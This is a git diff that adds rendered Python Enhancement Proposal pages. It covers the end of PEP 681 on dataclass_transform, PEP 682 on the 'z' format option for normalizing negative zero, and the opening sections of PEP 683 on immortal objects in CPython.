+@typing.dataclass_transform()
+class ModelBase: ...
+
+# The ``ModelBase`` class can now be used to create new model
+# subclasses, like this:
+class CustomerModel(ModelBase):
+    id: int
+    name: str
+
+
+
+
+

Metaclass example

+
# The ``ModelMeta`` metaclass and ``ModelBase`` class are defined by
+# a library. This could be in a type stub or inline.
+@typing.dataclass_transform()
+class ModelMeta(type): ...
+
+class ModelBase(metaclass=ModelMeta): ...
+
+# The ``ModelBase`` class can now be used to create new model
+# subclasses, like this:
+class CustomerModel(ModelBase):
+    id: int
+    name: str
+
+
+
+
+
+

Decorator function and class/metaclass parameters

+

A decorator function, class, or metaclass that provides dataclass-like functionality may accept parameters that modify certain behaviors. This specification defines the following parameters that static type checkers must honor if they are used by a dataclass transform. Each of these parameters accepts a bool argument, and it must be possible for the bool value (True or False) to be statically evaluated (a sketch illustrating this requirement follows the list below).

+
    +
  • eq, order, frozen, init and unsafe_hash are parameters +supported in the stdlib dataclass, with meanings defined in +PEP 557.
  • +
  • kw_only, match_args and slots are parameters supported +in the stdlib dataclass, first introduced in Python 3.10.
  • +
+
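A sketch of what “statically evaluated” means in practice, reusing the hypothetical create_model decorator from the examples:

import random
from typing import Callable, Type, TypeVar, dataclass_transform

_T = TypeVar("_T")

@dataclass_transform()
def create_model(*, frozen: bool = False) -> Callable[[Type[_T]], Type[_T]]:
    def wrap(cls: Type[_T]) -> Type[_T]:
        return cls  # a real library would synthesize __init__, __eq__, ...
    return wrap

@create_model(frozen=True)         # OK: a literal bool, statically evaluable
class FrozenModel:
    id: int

dynamic = random.random() > 0.5    # value known only at runtime
@create_model(frozen=dynamic)      # a type checker cannot honor this argument
class MaybeFrozenModel:
    id: int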
+
+

dataclass_transform parameters

+

Parameters to dataclass_transform allow for some basic +customization of default behaviors:

+
_T = TypeVar("_T")
+
+def dataclass_transform(
+    *,
+    eq_default: bool = True,
+    order_default: bool = False,
+    kw_only_default: bool = False,
+    field_specifiers: tuple[type | Callable[..., Any], ...] = (),
+    **kwargs: Any,
+) -> Callable[[_T], _T]: ...
+
+
+
    +
  • eq_default indicates whether the eq parameter is assumed to +be True or False if it is omitted by the caller. If not specified, +eq_default will default to True (the default assumption for +dataclass).
  • +
  • order_default indicates whether the order parameter is +assumed to be True or False if it is omitted by the caller. If not +specified, order_default will default to False (the default +assumption for dataclass).
  • +
  • kw_only_default indicates whether the kw_only parameter is +assumed to be True or False if it is omitted by the caller. If not +specified, kw_only_default will default to False (the default +assumption for dataclass).
  • +
  • field_specifiers specifies a static list of supported classes +that describe fields. Some libraries also supply functions to +allocate instances of field specifiers, and those functions may +also be specified in this tuple. If not specified, +field_specifiers will default to an empty tuple (no field +specifiers supported). The standard dataclass behavior supports +only one type of field specifier called Field plus a helper +function (field) that instantiates this class, so if we were +describing the stdlib dataclass behavior, we would provide the +tuple argument (dataclasses.Field, dataclasses.field).
  • +
  • kwargs allows arbitrary additional keyword args to be passed to +dataclass_transform. This gives type checkers the freedom to +support experimental parameters without needing to wait for changes +in typing.py. Type checkers should report errors for any +unrecognized parameters.
  • +
+

In the future, we may add additional parameters to +dataclass_transform as needed to support common behaviors in user +code. These additions will be made after reaching consensus on +typing-sig rather than via additional PEPs.

+

The following sections provide additional examples showing how these +parameters are used.

+
+

Decorator function example

+
# Indicate that the ``create_model`` function assumes keyword-only
+# parameters for the synthesized ``__init__`` method unless it is
+# invoked with ``kw_only=False``. It always synthesizes order-related
+# methods and provides no way to override this behavior.
+@typing.dataclass_transform(kw_only_default=True, order_default=True)
+def create_model(
+    *,
+    frozen: bool = False,
+    kw_only: bool = True,
+) -> Callable[[Type[_T]], Type[_T]]: ...
+
+# Example of how this decorator would be used by code that imports
+# from this library:
+@create_model(frozen=True, kw_only=False)
+class CustomerModel:
+    id: int
+    name: str
+
+
+
+
+

Class example

+
# Indicate that classes that derive from this class default to
+# synthesizing comparison methods.
+@typing.dataclass_transform(eq_default=True, order_default=True)
+class ModelBase:
+    def __init_subclass__(
+        cls,
+        *,
+        init: bool = True,
+        frozen: bool = False,
+        eq: bool = True,
+        order: bool = True,
+    ):
+        ...
+
+# Example of how this class would be used by code that imports
+# from this library:
+class CustomerModel(
+    ModelBase,
+    init=False,
+    frozen=True,
+    eq=False,
+    order=False,
+):
+    id: int
+    name: str
+
+
+
+
+

Metaclass example

+
# Indicate that classes that use this metaclass default to
+# synthesizing comparison methods.
+@typing.dataclass_transform(eq_default=True, order_default=True)
+class ModelMeta(type):
+    def __new__(
+        cls,
+        name,
+        bases,
+        namespace,
+        *,
+        init: bool = True,
+        frozen: bool = False,
+        eq: bool = True,
+        order: bool = True,
+    ):
+        ...
+
+class ModelBase(metaclass=ModelMeta):
+    ...
+
+# Example of how this class would be used by code that imports
+# from this library:
+class CustomerModel(
+    ModelBase,
+    init=False,
+    frozen=True,
+    eq=False,
+    order=False,
+):
+    id: int
+    name: str
+
+
+
+
+
+

Field specifiers

+

Most libraries that support dataclass-like semantics provide one or +more “field specifier” types that allow a class definition to provide +additional metadata about each field in the class. This metadata can +describe, for example, default values, or indicate whether the field +should be included in the synthesized __init__ method.

+

Field specifiers can be omitted in cases where additional metadata is +not required:

+
@dataclass
+class Employee:
+    # Field with no specifier
+    name: str
+
+    # Field that uses field specifier class instance
+    age: Optional[int] = field(default=None, init=False)
+
+    # Field with type annotation and simple initializer to
+    # describe default value
+    is_paid_hourly: bool = True
+
+    # Not a field (but rather a class variable) because type
+    # annotation is not provided.
+    office_number = "unassigned"
+
+
+
+

Field specifier parameters

+

Libraries that support dataclass-like semantics and support field specifier classes typically use common parameter names to construct these field specifiers. This specification formalizes the names and meanings of the parameters that must be understood by static type checkers. These standardized parameters must be keyword-only.

+

These parameters are a superset of those supported by +dataclasses.field, excluding those that do not have an impact on +type checking such as compare and hash.

+

Field specifier classes are allowed to use other +parameters in their constructors, and those parameters can be +positional and may use other names.

+
    +
  • init is an optional bool parameter that indicates whether the +field should be included in the synthesized __init__ method. If +unspecified, init defaults to True. Field specifier functions +can use overloads that implicitly specify the value of init +using a literal bool value type +(Literal[False] or Literal[True]).
  • +
  • default is an optional parameter that provides the default value +for the field.
  • +
  • default_factory is an optional parameter that provides a runtime +callback that returns the default value for the field. If neither +default nor default_factory are specified, the field is +assumed to have no default value and must be provided a value when +the class is instantiated.
  • +
  • factory is an alias for default_factory. Stdlib dataclasses +use the name default_factory, but attrs uses the name factory +in many scenarios, so this alias is necessary for supporting attrs.
  • +
  • kw_only is an optional bool parameter that indicates whether the +field should be marked as keyword-only. If true, the field will be +keyword-only. If false, it will not be keyword-only. If unspecified, +the value of the kw_only parameter on the object decorated with +dataclass_transform will be used, or if that is unspecified, the +value of kw_only_default on dataclass_transform will be used.
  • +
  • alias is an optional str parameter that provides an alternative +name for the field. This alternative name is used in the synthesized +__init__ method.
  • +
+

It is an error to specify more than one of default, +default_factory and factory.

+

This example demonstrates the above:

+
# Library code (within type stub or inline)
+# In this library, passing a resolver means that init must be False,
+# and the overload with Literal[False] enforces that.
+@overload
+def model_field(
+        *,
+        default: Optional[Any] = ...,
+        resolver: Callable[[], Any],
+        init: Literal[False] = False,
+    ) -> Any: ...
+
+@overload
+def model_field(
+        *,
+        default: Optional[Any] = ...,
+        resolver: None = None,
+        init: bool = True,
+    ) -> Any: ...
+
+@typing.dataclass_transform(
+    kw_only_default=True,
+    field_specifiers=(model_field, ))
+def create_model(
+    *,
+    init: bool = True,
+) -> Callable[[Type[_T]], Type[_T]]: ...
+
+# Code that imports this library:
+@create_model(init=False)
+class CustomerModel:
+    id: int = model_field(resolver=lambda : 0)
+    name: str
+
+
+
+
+
+

Runtime behavior

+

At runtime, the dataclass_transform decorator’s only effect is to +set an attribute named __dataclass_transform__ on the decorated +function or class to support introspection. The value of the attribute +should be a dict mapping the names of the dataclass_transform +parameters to their values.

+

For example:

+
{
+  "eq_default": True,
+  "order_default": False,
+  "kw_only_default": False,
+  "field_specifiers": (),
+  "kwargs": {}
+}
+
+
+
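A short runtime sketch of that introspection (create_model is hypothetical; the exact set of recorded keys may vary across Python versions):

import typing

@typing.dataclass_transform(order_default=True)
def create_model(cls):
    return cls

# The decorator's only runtime effect: parameters recorded for introspection.
print(create_model.__dataclass_transform__)
# e.g. {'eq_default': True, 'order_default': True, 'kw_only_default': False,
#       'field_specifiers': (), 'kwargs': {}}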
+
+

Dataclass semantics

+

Except where stated otherwise in this PEP, classes impacted by +dataclass_transform, either by inheriting from a class that is +decorated with dataclass_transform or by being decorated with +a function decorated with dataclass_transform, are assumed to +behave like stdlib dataclass.

+

This includes, but is not limited to, the following semantics:

+
    +
  • Frozen dataclasses cannot inherit from non-frozen dataclasses. A +class that has been decorated with dataclass_transform is +considered neither frozen nor non-frozen, thus allowing frozen +classes to inherit from it. Similarly, a class that directly +specifies a metaclass that is decorated with dataclass_transform +is considered neither frozen nor non-frozen.

    Consider these class examples:

    +
    # ModelBase is not considered either "frozen" or "non-frozen"
    +# because it is decorated with ``dataclass_transform``
    +@typing.dataclass_transform()
    +class ModelBase(): ...
    +
    +# Vehicle is considered non-frozen because it does not specify
    +# "frozen=True".
    +class Vehicle(ModelBase):
    +    name: str
    +
    +# Car is a frozen class that derives from Vehicle, which is a
    +# non-frozen class. This is an error.
    +class Car(Vehicle, frozen=True):
    +    wheel_count: int
    +
    +
    +

    And these similar metaclass examples:

    +
    @typing.dataclass_transform()
    +class ModelMeta(type): ...
    +
    +# ModelBase is not considered either "frozen" or "non-frozen"
    +# because it directly specifies ModelMeta as its metaclass.
    +class ModelBase(metaclass=ModelMeta): ...
    +
    +# Vehicle is considered non-frozen because it does not specify
    +# "frozen=True".
    +class Vehicle(ModelBase):
    +    name: str
    +
    +# Car is a frozen class that derives from Vehicle, which is a
    +# non-frozen class. This is an error.
    +class Car(Vehicle, frozen=True):
    +    wheel_count: int
    +
    +
    +
  • +
  • Field ordering and inheritance are assumed to follow the rules specified in PEP 557. This includes the effects of overrides (redefining a field in a child class that has already been defined in a parent class).
  • +
  • PEP 557 indicates that +all fields without default values must appear before +fields with default values. Although not explicitly +stated in PEP 557, this rule is ignored when init=False, and +this specification likewise ignores this requirement in that +situation. Likewise, there is no need to enforce this ordering when +keyword-only parameters are used for __init__, so the rule is +not enforced if kw_only semantics are in effect.
  • +
  • As with dataclass, method synthesis is skipped if it would +overwrite a method that is explicitly declared within the class. +Method declarations on base classes do not cause method synthesis to +be skipped.

    For example, if a class declares an __init__ method explicitly, +an __init__ method will not be synthesized for that class.

    +
  • +
  • KW_ONLY sentinel values are supported as described in the Python +docs and bpo-43532.
  • +
  • ClassVar attributes are not considered dataclass fields and are +ignored by dataclass mechanisms.
  • +
+
+
+

Undefined behavior

+

If multiple dataclass_transform decorators are found, either on a +single function (including its overloads), a single class, or within a +class hierarchy, the resulting behavior is undefined. Library authors +should avoid these scenarios.

+
+
+
+

Reference Implementation

+

Pyright contains the reference implementation of type +checker support for dataclass_transform. Pyright’s +dataClasses.ts source file would be a good +starting point for understanding the implementation.

+

The attrs and pydantic +libraries are using dataclass_transform and serve as real-world +examples of its usage.

+
+
+

Rejected Ideas

+
+

auto_attribs parameter

+

The attrs library supports an auto_attribs parameter that +indicates whether class members decorated with PEP 526 variable +annotations but with no assignment should be treated as data fields.

+

We considered supporting auto_attribs and a corresponding +auto_attribs_default parameter, but decided against this because it +is specific to attrs.

+

Django does not support declaring fields using type annotations only, +so Django users who leverage dataclass_transform should be aware +that they should always supply assigned values.

+
+
+

cmp parameter

+

The attrs library supports a bool parameter cmp that is equivalent +to setting both eq and order to True. We chose not to support +a cmp parameter, since it only applies to attrs. Users can emulate +the cmp behaviour by using the eq and order parameter names +instead.

+
+
+

Automatic field name aliasing

+

The attrs library performs automatic aliasing of +field names that start with a single underscore, stripping the +underscore from the name of the corresponding __init__ parameter.

+

This proposal omits that behavior since it is specific to attrs. Users +can manually alias these fields using the alias parameter.

+
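For instance, reusing the hypothetical model_field and create_model from the earlier examples, a user could opt into the attrs-style behaviour explicitly:

@create_model()
class Point:
    # Attribute remains ``_x``; the synthesized __init__ parameter is ``x``.
    _x: int = model_field(alias="x")

p = Point(x=1)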
+
+

Alternate field ordering algorithms

+

The attrs library currently supports two approaches to ordering the +fields within a class:

+
    +
  • Dataclass order: The same ordering used by dataclasses. This is the +default behavior of the older APIs (e.g. attr.s).
  • +
  • Method Resolution Order (MRO): This is the default behavior of the +newer APIs (e.g. define, mutable, frozen). Older APIs (e.g. attr.s) +can opt into this behavior by specifying collect_by_mro=True.
  • +
+

The resulting field orderings can differ in certain diamond-shaped +multiple inheritance scenarios.

+

For simplicity, this proposal does not support any field ordering +other than that used by dataclasses.

+
+
+

Fields redeclared in subclasses

+

The attrs library differs from stdlib dataclasses in how it +handles inherited fields that are redeclared in subclasses. The +dataclass specification preserves the original order, but attrs +defines a new order based on subclasses.

+

For simplicity, we chose to only support the dataclass behavior. +Users of attrs who rely on the attrs-specific ordering will not see +the expected order of parameters in the synthesized __init__ +method.

+
+
+

Django primary and foreign keys

+

Django applies additional logic for primary and foreign keys. For example, it automatically adds an id field +(and __init__ parameter) if there is no field designated as a +primary key.

+

As this is not broadly applicable to dataclass libraries, this +additional logic is not accommodated with this proposal, so +users of Django would need to explicitly declare the id field.

+
+
+

Class-wide default values

+

SQLAlchemy requested that we expose a way to specify that the default +value of all fields in the transformed class is None. It is typical +that all SQLAlchemy fields are optional, and None indicates that +the field is not set.

+

We chose not to support this feature, since it is specific to +SQLAlchemy. Users can manually set default=None on these fields +instead.

+
+
+

Descriptor-typed field support

+

We considered adding a boolean parameter on dataclass_transform +to enable better support for fields with descriptor types, which is +common in SQLAlchemy. When enabled, the type of each parameter on the +synthesized __init__ method corresponding to a descriptor-typed +field would be the type of the value parameter to the descriptor’s +__set__ method rather than the descriptor type itself. Similarly, +when setting the field, the __set__ value type would be expected. +And when getting the value of the field, its type would be expected to +match the return type of __get__.

+

This idea was based on the belief that dataclass did not properly +support descriptor-typed fields. In fact it does, but type checkers +(at least mypy and pyright) did not reflect the runtime behavior which +led to our misunderstanding. For more details, see the +Pyright bug.

+
+
+

converter field specifier parameter

+

The attrs library supports a converter field specifier parameter, which is a Callable that is called by the generated __init__ method to convert the supplied value to some other desired value. This is tricky to support since the parameter type in the synthesized __init__ method needs to accept unconverted values, but the resulting field is typed according to the output of the converter.

+

Some aspects of this issue are detailed in a +Pyright discussion.

+

There may be no good way to support this because there’s not enough +information to derive the type of the input parameter. One possible +solution would be to add support for a converter field specifier +parameter but then use the Any type for the corresponding +parameter in the __init__ method.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0681.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0682/index.html b/pep-0682/index.html new file mode 100644 index 00000000000..ae399ab4a5f --- /dev/null +++ b/pep-0682/index.html @@ -0,0 +1,309 @@ + PEP 682 – Format Specifier for Signed Zero | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 682 – Format Specifier for Signed Zero

+
+
Author:
+
John Belmonte <john at neggie.net>
+
Sponsor:
+
Mark Dickinson <dickinsm at gmail.com>
+
PEP-Delegate:
+
Mark Dickinson
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
29-Jan-2022
+
Python-Version:
+
3.11
+
Post-History:
+
08-Feb-2022
+
Resolution:
+
Discourse thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

Though float and Decimal types can represent signed zero, in many +fields of mathematics negative zero is surprising or unwanted – especially +in the context of displaying an (often rounded) numerical result. This PEP +proposes an extension to the string format specification allowing negative +zero to be normalized to positive zero.

+
+
+

Motivation

+

Here is negative zero:

+
>>> x = -0.
+>>> x
+-0.0
+
+
+

When formatting a number, negative zero can result from rounding. Assuming +the user’s intention is truly to discard precision, the distinction between +negative and positive zero of the rounded result might be considered an +unwanted artifact:

+
>>> for x in (.002, -.001, .060):
+...     print(f'{x: .1f}')
+ 0.0
+-0.0
+ 0.1
+
+
+

There are various approaches to clearing the sign of a negative zero. It +can be achieved without a conditional by adding positive zero:

+
>>> x = -0.
+>>> x + 0.
+0.0
+
+
+

To normalize negative zero when formatting, it is necessary to perform +a redundant (and error-prone) pre-rounding of the input:

+
>>> for x in (.002, -.001, .060):
+...     print(f'{round(x, 1) + 0.: .1f}')
+ 0.0
+ 0.0
+ 0.1
+
+
+

There is ample evidence that, regardless of the language, programmers are +often looking for a way to suppress negative zero, and landing on a +variety of workarounds (pre-round, post-regex, etc.). A sampling:

+ +

What we would like instead is a first-class option to normalize negative +zero, on top of everything else that numerical string formatting already +offers.

+
+
+

Rationale

+

There are use cases where negative zero is unwanted in formatted number +output – arguably, not wanting it is more common. Expanding the format +specification is the best way to support this because number formatting +already incorporates rounding, and the normalization of negative zero must +happen after rounding.

+

While it is possible to pre-round and normalize a number before formatting, +it’s tedious and prone to error if the rounding doesn’t precisely match +that of the format spec. Furthermore, functions that wrap formatting would +find themselves having to parse format specs to extract the precision +information. For example, consider how this utility for formatting +one-dimensional numerical arrays would be complicated by such pre-rounding:

+
def format_vector(v, format_spec='8.2f'):
+    """Format a vector (any iterable) using given per-term format string."""
+    return f"[{','.join(f'{term:{format_spec}}' for term in v)}]"
+
+
+
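For instance, with the proposed z option the helper needs no pre-rounding at all (illustrative output):

>>> format_vector([1, -0.001, 2])
'[    1.00,   -0.00,    2.00]'
>>> format_vector([1, -0.001, 2], 'z8.2f')
'[    1.00,    0.00,    2.00]'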

To date, there doesn’t appear to be any other widely-used language or library +providing a formatting option for negative zero. However, the same z +option syntax and semantics specified below have been proposed for C++ +std::format(). While the proposal was withdrawn for C++20, a consensus +proposal is promised for C++23. (The original feature request prompting +this PEP was argued without knowledge of the C++ proposal.)

+

When Rust developers debated whether to suppress negative zero in print +output, they took a small survey of other languages. Notably, it didn’t +mention any language providing an option for negative zero handling.

+
+
+

Specification

+

An optional, literal z is added to the +Format Specification Mini-Language following sign:

+
[[fill]align][sign][z][#][0][width][grouping_option][.precision][type]
+
+
+

where z is allowed for floating-point presentation types (f, g, +etc., as defined by the format specification documentation). Support for +z is provided by the .__format__() method of each numeric type, +allowing the specifier to be used in f-strings, built-in format(), and +str.format().

+

When z is present, negative zero (whether the original value or the +result of rounding) will be normalized to positive zero.

+

Synopsis:

+
>>> x = -.00001
+>>> f'{x:z.1f}'
+'0.0'
+
+>>> x = decimal.Decimal('-.00001')
+>>> '{:+z.1f}'.format(x)
+'+0.0'
+
+
+
+

Design Notes

+

The solution must be opt-in, because we can’t change the behavior of +programs that may be expecting or relying on negative zero when formatting +numbers.

+

The proposed extension is intentionally [sign][z] rather than +[sign[z]]. The default for sign (-) is not widely known or +explicitly written, so this avoids everyone having to learn it just to use +the z option.

+

While f-strings, built-in format(), and str.format() can access +the new option, %-formatting cannot. There is already precedent for not +extending %-formatting with new options, as was the case for the +, option (PEP 378).

+

C99 printf already uses the z option character for another +purpose: qualifying the unsigned type (u) to match the length of +size_t. However, since the signed zero option specifically disallows +z for integer presentation types, it’s possible to disambiguate the two +uses, should C want to adopt this new option.

+
+
+
+

Backwards Compatibility

+

The new formatting behavior is opt-in, so numerical formatting of existing +programs will not be affected.

+
+
+

How to Teach This

+

A typical introductory Python course will not cover string formatting +in full detail. For such a course, no adjustments would need to be made. +For a course that does go into details of the string format specification, +a single example demonstrating the effect of the z option on a negative +value that’s rounded to zero by the formatting should be enough. For an +independent developer encountering the feature in someone else’s code, +reference to the Format Specification Mini-Language section of the +library reference manual should suffice.

+
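Such an example might be as short as:

>>> f'{-0.004:.1f}'    # rounding to one decimal place yields negative zero
'-0.0'
>>> f'{-0.004:z.1f}'   # z normalizes the sign after rounding
'0.0'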
+
+

Reference Implementation

+

A reference implementation exists at pull request #30049.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0682.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0683/index.html b/pep-0683/index.html new file mode 100644 index 00000000000..e7030aee1e5 --- /dev/null +++ b/pep-0683/index.html @@ -0,0 +1,1018 @@ + PEP 683 – Immortal Objects, Using a Fixed Refcount | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 683 – Immortal Objects, Using a Fixed Refcount

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>, Eddie Elizondo <eduardo.elizondorueda at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-Feb-2022
+
Python-Version:
+
3.12
+
Post-History:
+
16-Feb-2022, +19-Feb-2022, +28-Feb-2022, +12-Aug-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at reference count.

+


+

See PEP 1 for how to propose changes.

+
+
+

PEP Acceptance Conditions

+

The PEP was accepted with conditions:

+
    +
  • the primary proposal in Solutions for Accidental De-Immortalization +(reset the immortal refcount in tp_dealloc()) was applied
  • +
  • types without this were not immortalized (in CPython’s code)
  • +
  • the PEP was updated with final benchmark results once +the implementation is finalized (confirming the change is worthwhile)
  • +
+
+
+

Abstract

+

Currently the CPython runtime maintains a +small amount of mutable state in the +allocated memory of each object. Because of this, otherwise immutable +objects are actually mutable. This can have a large negative impact +on CPU and memory performance, especially for approaches to increasing +Python’s scalability.

+

This proposal mandates that, internally, CPython will support marking +an object as one for which that runtime state will no longer change. +Consequently, such an object’s refcount will never reach 0, and thus +the object will never be cleaned up (except when the runtime knows +it’s safe to do so, like during runtime finalization). +We call these objects “immortal”. (Normally, only a relatively small +number of internal objects will ever be immortal.) +The fundamental improvement here is that now an object +can be truly immutable.

+
+

Scope

+

Object immortality is meant to be an internal-only feature, so this +proposal does not include any changes to public API or behavior +(with one exception). As usual, we may still add some private +(yet publicly accessible) API to do things like immortalize an object +or tell if one is immortal. Any effort to expose this feature to users +would need to be proposed separately.

+

There is one exception to “no change in behavior”: refcounting semantics +for immortal objects will differ in some cases from user expectations. +This exception, and the solution, are discussed below.

+

Most of this PEP focuses on an internal implementation that satisfies the above mandate. However, those implementation details are not meant to be strictly prescriptive. Instead, at the least they are included to help illustrate the technical considerations required by the mandate. The actual implementation may deviate somewhat as long as it satisfies the constraints outlined below. Furthermore, the acceptability of any specific implementation detail described below does not depend on the status of this PEP, unless explicitly specified.

+

For example, the particular details of:

+
    +
  • how to mark something as immortal
  • +
  • how to recognize something as immortal
  • +
  • which subset of functionally immortal objects are marked as immortal
  • +
  • which memory-management activities are skipped or modified for immortal objects
  • +
+

are not only CPython-specific but are also private implementation +details that are expected to change in subsequent versions.

+
+
+

Implementation Summary

+

Here’s a high-level look at the implementation:

+

If an object’s refcount matches a very specific value (defined below) +then that object is treated as immortal. The CPython C-API and runtime +will not modify the refcount (or other runtime state) of an immortal +object. The runtime will now be explicitly responsible for deallocating +all immortal objects during finalization, unless statically allocated. +(See Object Cleanup below.)

+

Aside from the change to refcounting semantics, there is one other possible negative impact to consider. The threshold for an “acceptable” performance penalty for immortal objects is 2% (the consensus at the 2022 Language Summit). A naive implementation of the approach described below makes CPython roughly 4% slower. However, the implementation is performance-neutral once known mitigations are applied.

+

TODO: Update the performance impact for the latest branch +(both for GCC and for clang).

+
+
+
+

Motivation

+

As noted above, currently all objects are effectively mutable. That +includes “immutable” objects like str instances. This is because +every object’s refcount is frequently modified as the object is used +during execution. This is especially significant for a number of +commonly used global (builtin) objects, e.g. None. Such objects +are used a lot, both in Python code and internally. That adds up to +a consistent high volume of refcount changes.

+

The effective mutability of all Python objects has a concrete impact +on parts of the Python community, e.g. projects that aim for +scalability like Instagram or the effort to make the GIL +per-interpreter. Below we describe several ways in which refcount +modification has a real negative effect on such projects. +None of that would happen for objects that are truly immutable.

+
+

Reducing CPU Cache Invalidation

+

Every modification of a refcount causes the corresponding CPU cache +line to be invalidated. This has a number of effects.

+

For one, the write must be propagated to other cache levels +and to main memory. This has small effect on all Python programs. +Immortal objects would provide a slight relief in that regard.

+

On top of that, multi-core applications pay a price. If two threads +(running simultaneously on distinct cores) are interacting with the +same object (e.g. None) then they will end up invalidating each +other’s caches with each incref and decref. This is true even for +otherwise immutable objects like True, 0, and str instances. +CPython’s GIL helps reduce this effect, since only one thread runs at a +time, but it doesn’t completely eliminate the penalty.

+
+
+

Avoiding Data Races

+

Speaking of multi-core, we are considering making the GIL +a per-interpreter lock, which would enable true multi-core parallelism. +Among other things, the GIL currently protects against races between +multiple concurrent threads that may incref or decref the same object. +Without a shared GIL, two running interpreters could not safely share +any objects, even otherwise immutable ones like None.

+

This means that, to have a per-interpreter GIL, each interpreter must +have its own copy of every object. That includes the singletons and +static types. We have a viable strategy for that but it will require +a meaningful amount of extra effort and extra complexity.

+

The alternative is to ensure that all shared objects are truly immutable. +There would be no races because there would be no modification. This +is something that the immortality proposed here would enable for +otherwise immutable objects. With immortal objects, +support for a per-interpreter GIL +becomes much simpler.

+
+
+

Avoiding Copy-on-Write

+

For some applications it makes sense to get the application into +a desired initial state and then fork the process for each worker. +This can result in a large performance improvement, especially +memory usage. Several enterprise Python users (e.g. Instagram, +YouTube) have taken advantage of this. However, the above +refcount semantics drastically reduce the benefits and +have led to some sub-optimal workarounds.

+

Also note that “fork” isn’t the only operating system mechanism +that uses copy-on-write semantics. Another example is mmap. +Any such utility will potentially benefit from fewer copy-on-writes +when immortal objects are involved, when compared to using only +“mortal” objects.

+
+
+
+

Rationale

+

The proposed solution is obvious enough that both of this proposal’s +authors came to the same conclusion (and implementation, more or less) +independently. The Pyston project uses a similar approach. +Other designs were also considered. Several possibilities have also +been discussed on python-dev in past years.

+

Alternatives include:

+
    +
  • use a high bit to mark “immortal” but do not change Py_INCREF()
  • +
  • add an explicit flag to objects
  • +
  • implement via the type (tp_dealloc() is a no-op)
  • +
  • track via the object’s type object
  • +
  • track with a separate table
  • +
+

Each of the above makes objects immortal, but none of them address +the performance penalties from refcount modification described above.

+

In the case of per-interpreter GIL, the only realistic alternative is to move all global objects into PyInterpreterState and add one or more lookup functions to access them. Then we’d have to add some hacks to the C-API to preserve compatibility for the many objects exposed there. The story is much, much simpler with immortal objects.

+
+
+

Impact

+
+

Benefits

+

Most notably, the cases described in the above examples stand +to benefit greatly from immortal objects. Projects using pre-fork +can drop their workarounds. For the per-interpreter GIL project, +immortal objects greatly simplifies the solution for existing static +types, as well as objects exposed by the public C-API.

+

In general, a strong immutability guarantee for objects enables Python +applications to scale better, particularly in +multi-process deployments. This is because they can then +leverage multi-core parallelism without such a significant tradeoff in +memory usage as they now have. The cases we just described, as well as +those described above in Motivation, reflect this improvement.

+
+
+

Performance

+

A naive implementation shows a 2% slowdown (3% with MSVC). We have demonstrated a return to performance-neutral with a handful of basic mitigations applied. See the mitigations section below.

+

On the positive side, immortal objects save a significant amount of +memory when used with a pre-fork model. Also, immortal +objects provide opportunities for specialization in the eval loop that +would improve performance.

+
+
+

Backward Compatibility

+

Ideally this internal-only feature would be completely compatible. +However, it does involve a change to refcount semantics in some cases. +Only immortal objects are affected, but this includes high-use objects +like None, True, and False.

+

Specifically, when an immortal object is involved (a short sketch follows this list):

+
    +
  • code that inspects the refcount will see a really, really large value
  • +
  • the new noop behavior may break code that:
      +
    • depends specifically on the refcount to always increment or decrement +(or have a specific value from Py_SET_REFCNT())
    • +
    • relies on any specific refcount value, other than 0 or 1
    • +
    • directly manipulates the refcount to store extra information there
    • +
    +
  • +
  • in 32-bit pre-3.12 Stable ABI extensions, +objects may leak due to Accidental Immortality
  • +
  • such extensions may crash due to Accidental De-Immortalizing
  • +
+
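As a sketch of the second bullet, code that assumes every new reference moves the refcount breaks once the object is immortal (the values observed via sys.getrefcount are illustrative):

import sys

def assert_incref_visible(obj):
    # Pre-immortal assumption: a new reference increments the refcount.
    before = sys.getrefcount(obj)
    extra = obj                    # take one more reference
    after = sys.getrefcount(obj)
    assert after == before + 1     # holds for mortal objects only
    del extra

assert_incref_visible([1, 2, 3])   # fine: an ordinary (mortal) object
assert_incref_visible(None)        # fails once None is immortal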

Again, those changes in behavior only apply to immortal objects, +not the vast majority of objects a user will use. Furthermore, +users cannot mark an object as immortal so no user-created objects +will ever have that changed behavior. Users that rely on any of +the changing behavior for global (builtin) objects are already +in trouble. So the overall impact should be small.

+

Also note that code which checks for refleaks should keep working fine, +unless it checks for hard-coded small values relative to some immortal +object. The problems noticed by Pyston shouldn’t apply here since +we do not modify the refcount.

+

See Public Refcount Details below for further discussion.

+
+

Accidental Immortality

+

Hypothetically, a non-immortal object could be incref’ed so much +that it reaches the magic value needed to be considered immortal. +That means it would never be decref’ed all the way back to 0, so it +would accidentally leak (never be cleaned up).

+

With 64-bit refcounts, this accidental scenario is so unlikely that +we need not worry. Even if done deliberately by using Py_INCREF() +in a tight loop and each iteration only took 1 CPU cycle, it would take +2^60 cycles (if the immortal bit were 2^60). At a fast 5 GHz that would +still take nearly 250,000,000 seconds (over 2,500 days)!

+
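The arithmetic behind those numbers, using the assumptions stated above (2^60 immortal bit, 5 GHz, one incref per cycle):

cycles = 2 ** 60                # increfs needed to reach the immortal bit
seconds = cycles / 5e9          # at 5 GHz, one incref per cycle
days = seconds / 86400
print(f"{seconds:,.0f} s ~ {days:,.0f} days")   # ~230,584,301 s ~ ~2,669 days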

Also note that it is doubly unlikely to be a problem because it wouldn’t +matter until the refcount would have gotten back to 0 and the object +cleaned up. So any object that hit that magic “immortal” refcount value +would have to be decref’ed that many times again before the change +in behavior would be noticed.

+

Again, the only realistic way that the magic refcount would be reached +(and then reversed) is if it were done deliberately. (Of course, the +same thing could be done efficiently using Py_SET_REFCNT() though +that would be even less of an accident.) At that point we don’t +consider it a concern of this proposal.

+

